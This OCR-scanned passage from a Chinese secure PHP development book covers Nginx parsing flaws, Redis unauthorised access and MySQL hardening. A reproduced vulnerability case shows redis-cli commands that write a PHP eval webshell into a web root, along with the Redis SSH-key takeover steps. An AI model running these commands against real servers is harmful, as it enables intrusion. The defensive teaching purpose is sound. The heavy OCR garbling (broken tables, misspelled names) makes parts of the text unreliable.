架 ， 假 设 为 ThinkPHP， 而 访问 网 站 又 是 唯一 入 口 文件 ， 就 说 明 使 用 了 pathinfo 功 能 ， 因 此 尽 
量 不 要 暴露 网 站 使 用 的 是 哪 种 框架 ， 通 常 在 各 个 框架 的 文档 中 有 介绍 如 何 关 闭 。 

在 上 述 条 件 中 ,最 为 关键 的 是 网 站 拥有 上 传 目录 的 脚本 执行 权限 ， 绝 大 部 分 情况 下 上 传 
目录 不 应 该 拥有 脚本 执行 权限 ， 和 否则 会 对 网 站 的 安全 性 造成 很 大 影响 。 

在 一 些小 网 站 中 ,文件 上 传 目录 直接 放 在 Web 运 行 目 录 下 ， 也 没有 做 目录 限制 ， 并 且 图 
片 或 者 一 些 附件 没有 经 过 转 码 ， 导 致 攻击 者 可 以 访问 原 图 。 


2. 防御 建议 
为 防止 上 述 漏洞 的 发 生 ， 这 里 给 出 几 点 防御 建议 。 


@ 上 传 目录 、 静 态 资源 (CSS、JS、 图 片 等 ) 目录 都 设置 好 屏蔽 PHP 执行 权限 。 比 如 
Apache 服务 器 可 以 在 相应 目录 下 放 一 个 .htaccess 文件， 里面 写 上 : 

















<FilesMatch "(Yi:\.php)$"> 
Deny from all 

</FilesMatch> 

多 ”所 有 图 片 输出 时 都 经 过 程序 处 理 ， 也 可 以 在 上 传 存储 时 就 处 理 一 遍 而 不 保存 原 图 。 

人 图片 使 用 不 同 的 服务 器 ， 与 业务 代码 数据 完全 隔离 ， 可 以 避免 图 片 作为 PHP 脚本 
运行 。 

多 ”如果 能 十 分 确定 该 服务 器 上 不 会 使 用 到 pathinfo 功能 ， 可 以 把 pathinof 配置 项 设 
为 0。 

3. Nginx 解析 漏洞 案例 

2012 年 11 月 ， 白 帽子 “Lmy” 提 交 漏洞 “ 某 服务 器 Nginx 解析 漏洞 ”。 

缺陷 编号 : wooyun-2012-011909。 


存在 漏洞 的 系统 是 一 家 视频 发 布 平台 ， 白 帽子 在 其 平台 中 发 现 一 张 图 片 ， 图 片 的 URL 
为 http://iphone.localhost.cn/static-files/touch.png, 白 帽 子 想到 Nginx 此 前 曝 出 过 解析 漏洞 ,于 
是 构造 出 一 个 URL (http://iphone.localhost.cn/static-files/touch.png/1.php) 用 于 测试 ， 当 访问 
构造 出 的 URL 时 ， 浏 览 器 出 现 如 图 4-6 所 示 的 界面 ， 可 以 看 出 图 片 依然 被 成 功 访问 。 
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图 4-6 图 片 被 成 功 访问 


当 此 地 址 能 被 访问 后 ， 便 能 得 出 此 系统 存在 解析 漏洞 的 结论 ， 在 此 案例 中 ， 此 漏洞 会 造 
成 危害 ， 不 过 如 果 此 网 站 再 出 现 图 片上 传 方面 的 朴 忽 ， 就 会 造成 服务 器 被 攻击 者 拿 到 
WebShell 权限 。 


Redis 对 较 大 的 网 站 来 说 是 一 个 非常 重要 的 工具 ， 因 此 大 部 分 Web 系 统 都 安装 了 Redis， 
但 很 多 开发 者 只 知道 使 用 其 功能 ， 却 不 大 了 解 其 中 的 一 些 安全 风险 ， 比 如 Redis 默 认 是 对 外 
开放 端口 访问 的 ， 如 此 就 很 容易 出 现 被 攻击 利用 的 漏洞 。 


4.5.1 漏洞 成 因 
1. 默认 对 外 开放 端口 


使 用 过 Redis 的 同学 应 该 都 知道 其 默认 端口 是 6379， 这 个 端口 自己 使 用 起 来 没有 问题 ， 
不 过 在 攻击 者 眼中 却 是 香 馆 镍 ,很 多 开发 者 不 注重 安全 问题 或 者 不 知道 端口 暴露 的 风险 ,让 
这 个 端口 对 外 网 主机 开放 ， 导 致 攻 击 者 也 可 以 通过 计算 机 来 连接 此 端口 。 因 此 ， 在 生产 环境 
中 使 用 Redis 一 定 要 先 考虑 好 自己 的 使 用 场景 ， 比 如 Redis 的 端口 是 否 需要 对 外 网 开放 ， 对 于 
小 型 网 站 来 说 直接 指定 本 机 127.0.0.1 访 问 就 可 以 ， 而 大 一 些 的 网 站 可 指定 通过 内 网 机 器 访 
问 ， 大 部 分 情况 下 是 没有 必要 对 外 网 开放 的 。 


2. 默认 无 密码 


Redis 是 一 个 NoSQL 型 数据 库 ， 通 常用 来 存储 缓存 数据 。 但 大 量 Redis 并 没有 设置 连接 密 
码 ， 这 样 就 会 导致 攻击 者 拥有 连接 Redis 的 权限 就 可 以 很 轻易 地 拿 到 数据 并 对 Redis 数 据 库 进 
行 操作 ， 从 给 攻击 者 增加 成 本 的 角度 来 说 ， 设 置 密 码 是 非常 有 必要 的 。 
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(1) 卫 绑 定 
Redis 的 配置 中 有 一 项 bind 配 置 ， 这 项 配置 在 网 上 有 很 多 文章 认为 是 客户 端的 耳 地 址 ， 其 
实 不 是 ， 配 置 中 的 原文 解释 是 这 样 的 : 


# 下 you want you can bind a single interface, if the bind option is not 
# specified all the interfaces will listen for incoming connections. 
# bind 127.0.0.1 


我 们 知道 ， 一 台 服 务 器 可 能 会 有 多 个 IP， 通 俗 来 讲 ， 也 就 是 可 能 拥有 多 个 网 卡 ， 如 果 不 
指定 使 用 哪 一 块 网 卡 来 监听 请 求 ， 将 使 用 全 部 网 卡 。 服 务 器 一 般 会 设置 两 块 网 卡 ， 一 块 是 内 
网 也， 一 块 是 外 网 中， 建议 让 内 网 了 来 监听 ， 不 要 监听 外 网 的 请 求 。 

(2 ) 设置 启动 权限 

前 面 的 一 些 安全 配置 中 多 次 提 到 过 启动 用 户 的 权限 问题 ， 在 Redis 中 也 不 例外 ， 需 要 使 
用 最 小 的 nobody 权 限 来 启动 ， 而 不 用 Linux 的 root 来 启动 ， 很 多 攻击 者 会 通过 攻击 Redis 来 获 
得 服务 器 权限 。 

我 们 可 以 从 此 攻击 方法 中 说 明 运行 账户 权限 的 重要 性 ， 攻 击 者 攻击 Redis 的 操作 步 又 
如 下 : 

人 ER) 扫描 端口 ， 查 找 有 Redis 服 务 的 服务 器 。 

D102 连接 查看 是 否 需 要 授权 。 

EEE3 查看 config dir。 

4 设置 config dir。 

CD05 生成 私 钥 和 公 钥 。 

GI06 上 传 公 钥 到 服务 器 。 

C0J07 把 公 钥 设置 到 服务 器 私 钥 认证 文件 。 

《ET08 使 用 私 钥 登 录 服务 器 。 

在 上 面 的 步骤 中 ， 主 要 步 双 有 3 个 ， 扫 描 端口 一 判断 是 否 需要 授权 一 上 传 公 钥 。 试 想 一 
下 ， 如 果 此 时 通过 root 账 户 启动 Redis， 就 会 导致 服务 器 被 直接 获取 root 权 限 ， 而 通过 nobody 
启动 ， 攻 击 者 只 能 获得 Redis 里 面 的 数据 ， 相 比 来 说 ， 安 全 风险 会 小 很 多 。 
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4.5.2 ”漏洞 案例 


2015 年 1 月 ， 白 帽子 “PyNerd” 提 交 漏洞 “ 某 公司 服务 器 Redis 未 授权 访问 (Redis 
的 getshell 案例 ) ”。 

缺陷 编号 : wooyun-2015-0124846。 

和 白 帽 子 在 URL (http://61.191.***.216/) 看 到 phpinfo 探 针 ， 于 是 对 此 服务 器 进行 了 一 次 
检测 ， 如 图 4-7 所 示 。 


所 GE D61.191.56.216 






































Www.Wooyun.org 











图 4-7 对 服务 进行 检测 


攻击 者 在 扫描 端口 后 ， 发 现 此 服务 器 一 些 端口 处 于 开放 状态 ， 根 据 端口 可 以 推断 出 是 
Redis、Memcache、MySQL、SSH 等 服务 ，Redis 未 授权 可 以 getshell， 于 是 选择 Redis 进行 
了 一 番 测 试 。 

由 于 此 服务 器 的 Redis 并 没有 做 任何 安全 策略 ， 白 帽子 可 以 通过 本 地 Redis 客户 端 连 接 
其 服务 器 ， 根 据 前 面 发 现 的 phpinfo 探 针 找到 document root， 并 通过 Redis 写 入 一 句 话 木 马 ， 
命令 如 下 : 

redis 61.191.56.216:6379> config set dir /usr/local/apache/htdocs/ 

OK 

redis 61.191.56.216:6379> config set dbfilename ok.php 

OK 

redis 61.191.56.216:6379> set test "<?php @eval($ POST[123]):2>" 

OK 

redis 61.191.56.216:6379> save 

OK 


通过 菜刀 连接 木马 ， 如 图 4-8 所 示 。 
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局 mpy6113156216/okphp， 
加 /usr/local /apache/htdocs/phpayadnin/ 
1 191.56.216 目录 (7), 文 件 (95) 
a2/ 
日 所 ssr 
日 局 loeal 
日 加 wache 
日 回 htdoes 


a DD EEE 










时 间 大 小 属性 






1 二 二 文生 证 直 二 加 二 二 二 二 页 二 二 二 DODDDDDD 医 





wwwwooyun.ofg 





图 4-8 通过 菜刀 连接 木马 
当 攻 击 者 通过 软件 “中 国 菜刀 ”连接 上 服务 器 中 的 一 句 话 木马 后 , 就 可 以 对 服务 器 的 文 
件 进行 操作 ， 也 可 以 执行 shell 命令 。 
4.5.3 小 结 


对 于 小 型 网 站 ， 开 发 者 或 许 觉得 Redis 对 系统 安全 来 说 无 足 轻 重 ， 其 实 从 安全 的 角度 来 
看 ， 无 论 你 的 网 站 是 小 还 是 大 ， 一 旦 被 攻击 者 拿 到 root 权 限 ， 结 果 都 会 存在 致命 的 风险 。 





MySQL 是 LNMP 坏 境 中 的 重要 一 环 , 同时 存储 着 网 站 的 核心 数据 , 而 攻击 者 往往 对 数据 
非常 感 兴趣 ， 因 此 对 于 数据 库 的 安全 ， 我 们 要 更 加 重视 。 本 节 从 MySQL 数 据 库 安全 加 固 的 
角度 来 探讨 开发 者 能 采取 哪些 措施 来 保证 数据 库 的 安全 。 


4.6.1 权限 安全 


MySQL 中 的 权限 控制 十 分 严谨 ， 可 以 针对 用 户 、 数 据 库 、 数 据 表 、 数 据 操作 方面 进行 
控制 , 分 别 对 应 着 控制 权限 的 表 , 比如 USER、DB、HOST、TABLES_PRIV、COLUMNS_PRIV,， 
各 个 表 的 说 明 如 表 4-2 所 示 。 
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表 4-2 MySQL 权限 表 的 名 称 与 功能 

















序号 | 表 名 称 功能 

USER 表 列 出 可 以 连接 服务 器 的 用 户 及 其 口令 ， 并 且 指 定 有 哪 种 全 局 
i (超级 用 户 ) 权限。 在 USER 表 启 用 的 任何 权限 均 是 全 局 权限 ， 并 适 

用 于 所 有 数据 库 。 例 如 ， 如 果 你 启用 了 DELETE 权限 ， 在 这 里 列 出 的 

用 户 就 可 以 从 任何 表 中 删除 记录 ， 所 以 在 这 样 做 之 前 要 认真 考虑 
3 DB 表 列 出 数据 库 ， 而 用 户 有 权限 访问 它们 。 在 这 里 指定 的 权限 适用 于 

-个 数据 库 中 的 所 有 表 

HOST 表 与 DB 表 结 合 使 用 在 一 个 较 好 的 层次 上 , 控制 特定 主机 对 数据 
3 HOST 库 的 访问 权限 ， 这 可 能 比 单独 使 用 DB 好 些 。 这 个 表 不 受 GRANT 和 

REVOKE 语句 的 影响 ， 所 以 你 可 能 发 觉 根 本 不 是 用 它 

TABLES_PRIV 表 指 定 表 级 权限 , 在 这 里 指定 的 一 个 权限 适用 于 一 个 表 
4 TABLES_PRIV 

的 所 有 列 

COLUMNS_PRIV 表 指 定 列 级 权限 。 这 里 指定 的 权限 适用 于 一 个 表 的 

5 COLUMNS _PRIV 特定 列 





在 MySQL 中 有 一 个 数据 库 “information_schema”， 里 面 保存 的 也 是 一 些 权限 信息 ， 不 
过 这 个 数据 库 “information_schema” 是 为 系统 管理 员 提 供 元 数据 的 一 种 简便 方式 ， 它 实际 
上 是 一 个 视图 ， 可 以 理解 为 对 MySQL 中 一 个 信息 的 封装 ， 对 于 MySQL 主 程序 来 说 ， 身 份 认 
证 和 授权 信息 的 来 源 只 有 一 个 ， 就 是 MySQL。 


1. 验证 流程 


PHP 在 与 MySQL 进 行 数据 库 连 接 、 登 录 时 ， 会 通过 权限 表 的 验证 首先 从 USER 表 中 判断 
连接 的 下、 用 户 名 、 密 码 是 否 存在 ， 如 果 存 在 ， 就 通过 验证 。 通 过 身份 认证 后 ， 进 行 权 限 分 
配 ， 按 照 :user db tables_priv columns_priv 的 顺序 进行 验证 。 

先 检 查 全 局 权限 表 USER， 如 果 USER 中 对 应 的 权限 为 Y， 则 此 用 户 对 所 有 数据 库 的 权限 
都 为 Y， 将 不 再 检查 DB、TABLES_PRIV、COLUMNS_PRIV。 如 果 全 局 权限 表 USER 对 应 的 权 
限 为 N, 则 到 DB 表 中 检查 此 用 户 对 应 的 具体 数据 库 ， 并 得 到 DB 中 为 Y 的 权限 。 如 果 DB 中 为 N， 
则 检查 TABLES_PRIV 中 此 数据 库 对 应 的 具体 表 ， 取 得 表 中 的 权限 Y。 以 此 类 推 ， 逐 级 下 降 。 


2. 权限 配置 


从 上 面 的 描述 中 可 以 看 出 ，MySQL 的 账户 权限 原理 和 判断 流程 ， 下 面 再 来 看 看 “最 小 
权限 原则 ”权限 配置 。MySQL 账 户 的 权限 优先 级 顺序 是 : USER 一 DB 一 TABLES_PRIV 一 
COLUMNS_PRI。 
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上 面 4 张 表 的 作用 在 本 质 上 是 一 样 的 ， 区 别 在 于 它们 的 作用 域 范围 不 同 ， 从 USER 到 


COLUMNS _PRIf 





FE 用 域 范围 逐 级 降低 ,因此 控制 力度 也 变 大 , 它们 的 配置 遵循 “就 近 原 则 ”， 


即 以 优先 级 最 低 的 那个 为 准 ， 所 以 在 进行 MySQL 账 户 权 限 安全 配置 的 时 候 ， 会 发 现 “似乎 
在 做 很 多 重复 性 工作 ”。 

但 要 明白 ，MySQL 这 种 逐 层 次 的 权限 配置 体系 提供 了 一 个 细 力 度 的 控制 方法 ， 所 以 权 
限 配 置 也 应 该 按照 这 个 顺序 来 有 规划 地 进行 。 


3. USER 表 





USER 表 各 命令 权限 说 明 如 表 4-3 所 示 。 


表 4-3 ”USER 表 的 权限 说 明 























权限 权限 级 别 权限 说 明 网 站 账户 权限 
数据 库 、 表 或 建议 给 予 ， 安 装 Web 系统 

CREATE 索引 创建 数据 库 、 表 或 索引 权限 时 需要 创建 表 

DROP 数据 库 或 表 删除 数据 库 或 表 权限 建议 给 予 

GRANT OPTION tg 赋予 权限 选项 不 建议 给 予 

REFERENCES 数据 库 或 表 无 不 建议 给 予 

ALTER 表 更 改 表 ， 比 如 添加 字段 、 索 引 等 | 建议 给 予 

DELETE 表 删除 数据 权限 建议 给 予 

INDEX 表 索引 权限 建议 给 予 

INSERT 表 插入 权限 建议 给 予 

SELECT 表 查询 权限 建议 给 予 

UPDATE 表 更 新 权限 建议 给 予 

CREATE VIEW | 视图 创建 视图 权限 建议 给 予 

SHOW VIEW 视图 查看 视图 权限 建议 给 予 

i 存储 过 程 。 ”| 更 改 存储 过 程 权限 不 建议 给 巴 

SE 存储 过 程 。 ”| 创建 存储 过 程 权限 不 建议 给 予 

ROUTINE 

EXECUTE 存储 过 程 执行 存储 过 程 权 限 不 建议 给 予 

四 服务 器 主机 上 文件 访问 权限 不 建议 给 予 , 防止 因为 注入 
的 文件 访问 导致 的 隐私 文件 泄露 
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( 续 表 ) 
权限 权限 级 别 权限 说 明 网 站 账户 权限 
CREATE 
不 建议 给 予 , 防止 借助 临时 
M Y 了 管理 创建 临时 表 
TEMPORAR: 服务 器 管理 中 建 临 时 表 权 限 表 发 动 的 二 次 注入 
TABLES 
LOCK TABLES “| 服务 器 管理 锁 表 权限 不 建议 给 予 
CREATE USER | 服务 器 管理 创建 用 户 权限 不 建议 给 予 
PROCESS 服务 器 管理 查看 进程 权限 不 建议 给 予 
执行 flush-hosts 、flush-logs 、 
flush-privileges 、 flush- 
RELOAD 服务 器 管理 ES es 不 建议 给 予 


flush-tables 、 flush-threads 、 


refresh、reload 等 命令 的 权限 


REPLICATION 




















服务 器 管理 复制 权限 不 建议 给 予 
CLIENT 
REPLICATION 

服务 器 管理 复制 权限 不 建议 给 予 
SLAVE 

HOW - 

服务 器 管理 查看 数据 库 列 表 权 限 不 建议 给 予 
DATABASES 
SHUTDOWN 服务 器 管理 关闭 数据 库 权 限 不 建议 给 予 
SUPER 服务 器 管理 执行 kill 线程 权限 不 建议 给 予 





从 表 中 可 以 看 到 ，USER 表 主要 针对 数据 库 的 账户 进行 粗 力度 的 权限 控制 ， 定 义 了 “ 某 
人 人 允许 做 什么 事 ”。 


4. DB 表 


DB 表 各 命令 权限 说 明 如 表 4-4 所 示 。 


表 4-4 ”DB 表 各 命令 的 权限 说 明 


























权限 说 明 网 站 使 用 账户 权限 
SELECT 可 对 其 下 所 有 表 进 行 查询 建议 给 予 
INSERT | 可 对 其 下 所 有 表 进行 插入 | 建议 给 予 
UPDATE | 可 对 其 下 所 有 表 进 行 更 新 建议 给 予 
DELETE | 可 对 其 下 所 有 表 进行 删除 | 建议 给 予 
CREATE | 可 在 此 数据 库 下 创建 表 或 者 索引 建议 给 予 

DROP 可 删除 此 数据 库 及 此 数据 库 下 的 表 不 建议 给 予 
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( 续 表 ) 
权限 说 明 网 站 使 用 账户 权限 
GRANT 赋予 权限 选项 不 建议 给 予 
REFERENCES 未 来 MySQL 特性 的 占 位 符 不 建议 给 予 
INDEX 可 对 其 下 的 所 有 表 进 行 索引 建议 给 予 
ALTER 可 对 其 下 的 所 有 表 进 行 更 改 建议 给 予 
CREATE TMP TABLE 创建 临时 表 不 建议 给 予 
LOCK TABLES 可 对 其 下 所 有 表 进 行 锁定 不 建议 给 予 
CREATE VIEW 可 在 此 数据 下 创建 视图 建议 给 予 
SHOW_VIEW 可 在 此 数据 下 查看 视图 建议 给 予 
CREATE ROUTINE 可 在 此 数据 下 创建 存储 过 程 不 建议 给 予 
ALTER_ROUTINE 可 在 此 数据 下 更 改 存储 过 程 不 建议 给 予 
EXECUTE 可 在 此 数据 下 执行 存储 过 程 不 建议 给 予 
EVENT 可 在 此 数据 下 创建 事件 调度 器 不 建议 给 予 
TRIGGER 可 在 此 数据 下 创建 触发 器 不 建议 给 予 





DB 表 可 以 看 成 是 USER 表 对 权限 控制 的 一 个 补充 ， 
权限 控制 。 同 时 DB 表 也 隐 式 包含 将 账户 限定 在 某 个 数据 库 范围 内 这 个 配置 ， 即 限制 某 个 用 
户 只 能 拥有 对 自己 的 数据 库 的 控制 权 ， 对 不 属于 自己 的 数据 库 禁止 操作 ， 这 能 有 效 防 止 横向 


越权 的 发 生 。 
5. 常见 权限 命令 





-个 更 细 粒 度 的 、 针 对 数据 库 级 别 的 


账户 权限 安全 配置 的 常用 命令 如 表 4-5 所 示 。 


表 4-5 ”账户 权限 安全 配置 常用 命令 









































序号 | 操作 命令 

1 新 建 一 个 用 户 | grant select,insert,update,delete,create,drop privileges on database.* to user@ 
并 给 予 相应 数 | localhost identified by 'passwd'; 
据 库 的 权限 grant all privileges on database.* to user(@localhost identified by 'passwd'; 

2 | 刷新 权限 flush privileges; 

3 显示 授权 show grants; 

4 移 除 授权 revoke delete on *.* from 'user'@'localhost'; 

3 删除 用 户 drop user 'user'(@'localhost'; 

6 给 用 户 改名 rename user jack'(@'%’ to Jim'(@'%'; 

7 | 给 用 户 改 密码 “| SET PASSWORD FOR 'root @'localhost = PASSWORD('123456"); 
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6. 权限 配置 原则 
(1) 针对 每 个 网 站 建立 一 个 单独 的 账户 。 
(2) 为 每 个 网 站 单独 建立 一 个 专属 数据 库 。 
(3) 按照 USER 一 DB 一 TABLES PRIV 一 COLUMNS _PRI 的 顺序 进行 细 粒 度 的 权限 
控制 。 
(4) 为 每 个 用 户 单独 配置 一 个 专属 数据 库 ， 保 证 当前 用 户 的 所 有 操作 只 能 发 生 在 自己 
的 数据 库 中 ， 防 止 SQL 注 入 发 生 后 ， 攻 击 者 通过 注入 点 访问 系统 表 。 
4.6.2 ”网 络 配置 
MySQL 服 务 通 常会 通过 IP 地 址 加 端口 的 形式 给 PHP 提 供 服 务 ， 在 使 用 MySQL 服 务 的 同 
时 ， 我 们 需要 考虑 一 些 安 全 问题 ， 比 如 调用 MySQL 的 主机 只 有 几 台 服务 器 ， 就 没有 必要 把 
MySQL 的 连接 对 整个 内 网 开放 。 因 为 MySQL 默 认 使 用 3306 端 口 ， 如 果 内 网 中 某 台 服务 器 已 





经 被 攻击 者 控制 ， 就 有 可 能 扫描 3306 端 口 ， 为 防 患 于 未 然 ， 建 议 对 默认 端口 进行 修改 。 
1. 限制 IP 


对 于 MySQL 的 访问 IP 限 制 ， 可 以 从 应 用 层 和 主机 层 来 分 别 达 到 目的 。 从 主机 层 来 说 ， 
如 果 系 统 是 Windows, 可 以 通过 Windows 防 火 墙 , 而 Linux 下 可 以 通过 iptables 来 限制 允许 访问 
MySQL 端 口 的 IP 地 址 ， 命 令 如 下 ， 只 允许 192.168.1.0 网 段 进 行 访问 。 


iptables -A INPUT -p tcp -s 192.168.1.0/24 --dport 3306 -j ACCEPT 
iptables -P INPUT DROP 


通过 下 面 的 命令 可 以 看 到 用 户 可 以 从 什么 地 方 来 访问 ， 如 图 4-9 所 示 。 


mysql> select host,user,password from user; 


Jser from user 





图 4-9 上 账户 root 只 能 在 本 机 登录 


从 图 4-9 中 可 以 看 出 ， 账 户 root 只 能 在 本 机 登录 , 在 部 署 的 过 程 中 ， 可 以 为 指定 账户 添加 
某 个 安全 的 跳板 机 ， 并 保证 这 个 跳板 机 的 耳 是 不 变 的 。 
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2. 修改 端口 

在 Windows 中 ， 可 以 修改 配置 文件 my.ini 来 实现 ， 在 Linux 中 ， 可 以 修改 配置 文件 my.cnf 
来 实现 。 

port = 3306 


对 MySQL 端 口 的 修改 可 以 从 一 定 程度 上 防止 端口 扫描 工具 的 扫描 。 
3. 账户 密码 
因为 MySQL 本 身 没有 抗 穷 举 的 账号 锁定 机 制 ， 所 以 对 于 MySQL 自 身 的 登录 账号 ， 尤 其 


是 root 账 号 ， 需 要 遵循 “密码 强度 策略 ”设置 高 强度 的 密码 ， 保 证 攻击 者 从 穷 举 账号 攻击 这 
条 路 无 法 获得 合适 的 投资 收益 比 。 


4.6.3 MySQL 日志 


全 ， 


1. 日 志 作 用 


启动 MySQL 的 日 志 不 仅 可 以 提供 性 能 热点 的 分 析 ， 还 可 以 帮助 加 固 MySQL 数 据 库 的 安 
例如 : 


(1) 从 日 志 中 获得 典型 SQL 注入 语句 。 
(2) 利用 正则 模型 从 日 志 中 捕获 注入 攻击 的 发 生 。 
(3) 在 脱 库 、 数 据 泄露 之 后 获得 关于 受 攻击 数据 库 的 情况 、 泄 露 范围 等 数据 。 
2. 日 志 类 型 
MySQL 有 以 下 几 种 日 志 ， 它 们 都 在 my.ini 中 进行 配置 : 
(1) 错误 日 志 : log-error="D:/public/wamp64/logs/mysql.log"。 
(2) 查询 日 志 : log="D:/public/wamp64/logs/mysql.log"。 
(3) 慢 查 询 日 志 : log-slow-queries="D:/public/wamp64/logsmysql_slow.log"。 
(4) 更 新 日 志 : log-update="D:/public/wamp64/logs/mysql_update.log"。 
(5) 二 进 制 日 志 : log-bin="D:/public/wamp64/logs/bin"。 
3. 查询 方法 


查看 日 志 开 启 情况 : show variables like 'log_%';。 
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和 a 
| Variable name | Value | 
er 生生 让 全 全 
|log bin |OFF | 


| log_bin_basename | | 
和 | | 


|log syslog tag | 
|log throttle_queries not using_indexes |0 


|log_ bin_ trust_ function creators |OFF | 
|log bin use vl1_ row events |OFF | 
|log_builtin as identified by password |OFF | 
|log_error | D:/public/wamp64/logs/mysql.log | 
| log_error verbosity 12 | 
|log_output IFILE | 
|log queries not using indexes |OFF | 
|log_slave_updates |OFF | 
|log_slow_admin statements | OFF | 
|log_slow_slave_statements | OFF | 
|log statements_unsafe for_binlog ION | 
|log syslog ION | 
| 
| 
| log timestamps 1UTC | 
|log warnings 11 | 
Te ee 十 


4.6.4 主机 配置 

Web 安 全 问题 是 一 个 综合 问题 ，MySQL 的 安全 配置 和 所 在 系统 的 安全 配置 也 有 着 密切 
的 关联 ， 比 如 MySQL 的 运行 账户 所 拥有 的 权限 、mysql.sock 配 置 等 方面 ， 下 面 介绍 安全 的 配 
置 建议 。 

1. 运行 账户 

MySQL 运 行 账户 是 指 以 什么 样 的 身份 权限 来 启动 mysqld 服 务 。 对 于 操作 系统 来 说 ， 每 
一 个 进程 都 有 一 个 对 应 的 “进程 运行 账号 ”， 这 个 进程 运行 账号 决定 了 这 个 应 用 程序 可 以 获 
得 哪些 操作 系统 的 权限 。 

在 Linux 下 新 建 一 个 MySQL 账 号 ， 并 在 安装 的 时 候 指 定 MySQL 以 MySQL 账 户 来 运行 ， 
给 予 程序 所 在 目录 的 读 取 权限 、data 所 在 目录 的 读 取 和 写 入 权限 。 

2. mysql.sock 配置 


默认 情况 下 ，PHP 支 持 使 用 socket 方 式 和 MySQL 数 据 库 进 行 通信 ， 这 也 意味 着 ， 在 服务 
器 本 机 允许 无 密码 直接 登录 MySQL， 请 看 下 面 的 一 段 实例 代码 : 
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<2php 

ini_set("mysqldefault_ socket = /var/lib/mysql/mysql.sock"); 
$sql = "select user();"; 

Sres = mysql_query($sql); 

S$final = mysql_fetch_array($res); 

die(var_ dump($final)); 

执行 成 功 ， 结 果 如 下 : 


array(2) { 
[0]=>string(16) "root@localhost" ["user"]=> string(16) "root(@localhost" 


} 

这 意味 着 攻击 者 在 获取 了 目标 服务 器 的 WebShell 之 后 ， 可 以 在 不 知道 MySQL 账 号 和 密 
码 的 情况 下 直接 从 数据 库 中 获取 隐私 数据 。 

防御 的 方法 是 针对 MySQL 程 序 账号 进行 磁盘 ACL 控 制 ， 防 止 MySQL 越 权 读 / 写 /执行 非 
MySQL 目 录 下 的 文件 。 
4.6.5 ”启动 选项 

在 启动 mysqld 服 务 的 时 候 ， 有 许多 参数 可 以 选择 ， 其 中 有 些 参数 对 安全 方面 有 不 错 的 防 
御 效果 ， 表 4-6 给 出 了 几 种 与 MySQL 安 全 相关 的 启动 选项 。 


表 4-6 与 MySQL 安 全 相关 的 启动 选项 







如 果 用 - local-infile=0 启动 服务 器 ， 客 户 端 就 不 能 使 用 LOCAL in 
LOAD DATA 语句 ， 防 止 基于 注入 的 文件 直接 读 取 数 据 泄露 
强制 服务 器 为 新 密码 生成 短 (pre-4.1) 密码 哈 希 。 当 服务 器 必须 支持 
旧版 本 客户 端 程序 时 ， 为 了 保证 兼容 性 ， 这 很 有 用 
在 MySQL 5.1 以 前 版 本 中 ， 该 选项 使 SHOW DATABASES 语句 只 显 
示 用 户 具有 部 分 权限 的 数据 库 名 

在 MySQL 5.1 中 ， 该 选项 不 再 作为 默认 行为 使 用 ， 有 一 个 SHOW 
DATABASES 权限 可 以 用 来 控制 每 个 账户 对 数据 库 名 的 访问 

如 果 启 用 ， 用 户 不 能 用 GRANT 语句 创建 新 用 户 ， 除 非 用 户 有 
mysql.user 表 的 INSERT 权限 。 如 果 你 想 让 用 户 具有 授权 权限 来 创建 
新 用 户 ， 应 给 用 户 授予 下 面 的 权限 : 

mysql> GRANT INSERT(user) ON mysql.user TO &#039;user name&# 
039;(@&#039;host_name'; 

这 样 确保 用 户 不 能 直接 更 改 权 限 列 , 必须 使 用 GRANT 语句 给 其 他 用 
户 授 予 该 权限 


--local-infile[={0|1}] 









2 --Old-passwords 














(OBSOLETE)  - 


safe-show-database 

















4 --safe-user-create 




















165 


PHP Web 安全 开发 实战 














( 续 表 ) 
序号 | 参数 说 明 
5 --Secure-auth 不 允许 鉴定 有 旧 (pre-4.1) 密码 的 账户 
6 --skip-grant-tables 这 个 选项 导致 服务 器 根本 不 使 用 权限 系统 .这 给 每 个 人 以 完全 访问 所 
有 数据 库 的 权力 ， 这 个 选项 常常 发 生 在 忘记 了 MySQL 密码 的 情况 
下 ,使 用 这 个 方式 在 本 机 "无 密码 登录 MySQL", 通过 执行 mysqladmin 
flush-privileges 或 mysqladmin eload 命令 ， 或 执行 FLUSH 
PRIVILEGES 语句 ， 能 告诉 一 个 正在 运行 的 服务 器 再 次 开始 使 用 授 
权 表 
7 --skip-name-resolve_| 主机 名 不 被 解析 。 所 有 在 授权 表 的 Host 列 值 必须 是 IP 号 或 localhost 
8 --skip-networking 在 网 络 上 不 允许 TCP/IP 连接 。 所 有 到 mysqld 的 连接 必须 经 由 UNIX 
9 --skip-show-databas | 使 用 该 选项 只 允许 有 SHOW DATABASES 权限 的 用 户 执 行 
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已 





SHOW DATABASES 语句 ， 该 语句 显示 所 有 数据 库 名 。 不 使 用 该 选 
项 ， 人 允许 所 有 用 户 执 行 SHOW DATABASES， 但 只 显示 用 户 有 
SHOW DATABASES 权限 或 部 分 数据 库 权 限 的 数据 库 名 。 注 意 全 局 
权限 指数 据 库 的 权限 


认证 与 加 密 


数据 加 密 是 指 通 过 加 密 算法 和 加 密 密 钥 将 明文 转变 为 密 文 , 而 解密 则 是 通过 解密 算法 和 
解密 密 钥 将 密 文 恢复 为 明文 ， 利 用 密码 技术 对 信息 进行 加 密 ， 实 现 信息 隐 项 ， 从 而 起 到 保护 
信息 安全 的 作用 。 加 密 技 术 可 分 为 对 称 加 密 和 非 对 称 加 密 ， 而 认证 技术 则 主要 可 从 消息 认证 
和 身份 认证 两 方面 进行 概述 。 

本 章 主要 介绍 加 密 和 认证 的 相关 技术 ,以 帮助 开发 人 员 了 解 其 技术 特点 ， 从 而 开发 出 安 
全 的 应 用 。 


5.1 数据 加 密 与 签名 


5.1.1 ”对称 加 密 与 非 对 称 加 密 

所 谓 对 称 加 密 ， 就 是 双方 使 用 同样 的 密 钥 进行 加 密 和 解密 。 密 钥 是 控制 加 密 及 解密 过 程 
的 指令 。 算 法 是 一 组 规则 ， 规 定 如 何 进 行 加 密 和 解密 。 相 比 非 对 称 加 密 ， 对 称 加 密 算法 的 加 
密 和 解密 速度 更 快 ， 所 以 在 传输 的 数据 量 比较 大 时 比较 适合 使 用 。 

非 对 称 加 密 是 1976 年 美国 学 者 Dime 和 Henman 设 计 出 来 的 ， 当 时 为 了 解决 信息 公开 传送 
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和 密 钥 管理 问题 , 提出 了 一 种 新 的 密 钥 交换 协议 , 目的 是 解决 在 不 安全 的 网 络 中 传输 对 称 加 
密 密 钥 被 截获 的 问题 。 

非 对 称 加 密 算法 需要 两 个 密 钥 : 公开 密 钥 (publickey) 和 私有 密 钥 (privatekey) 。 公 
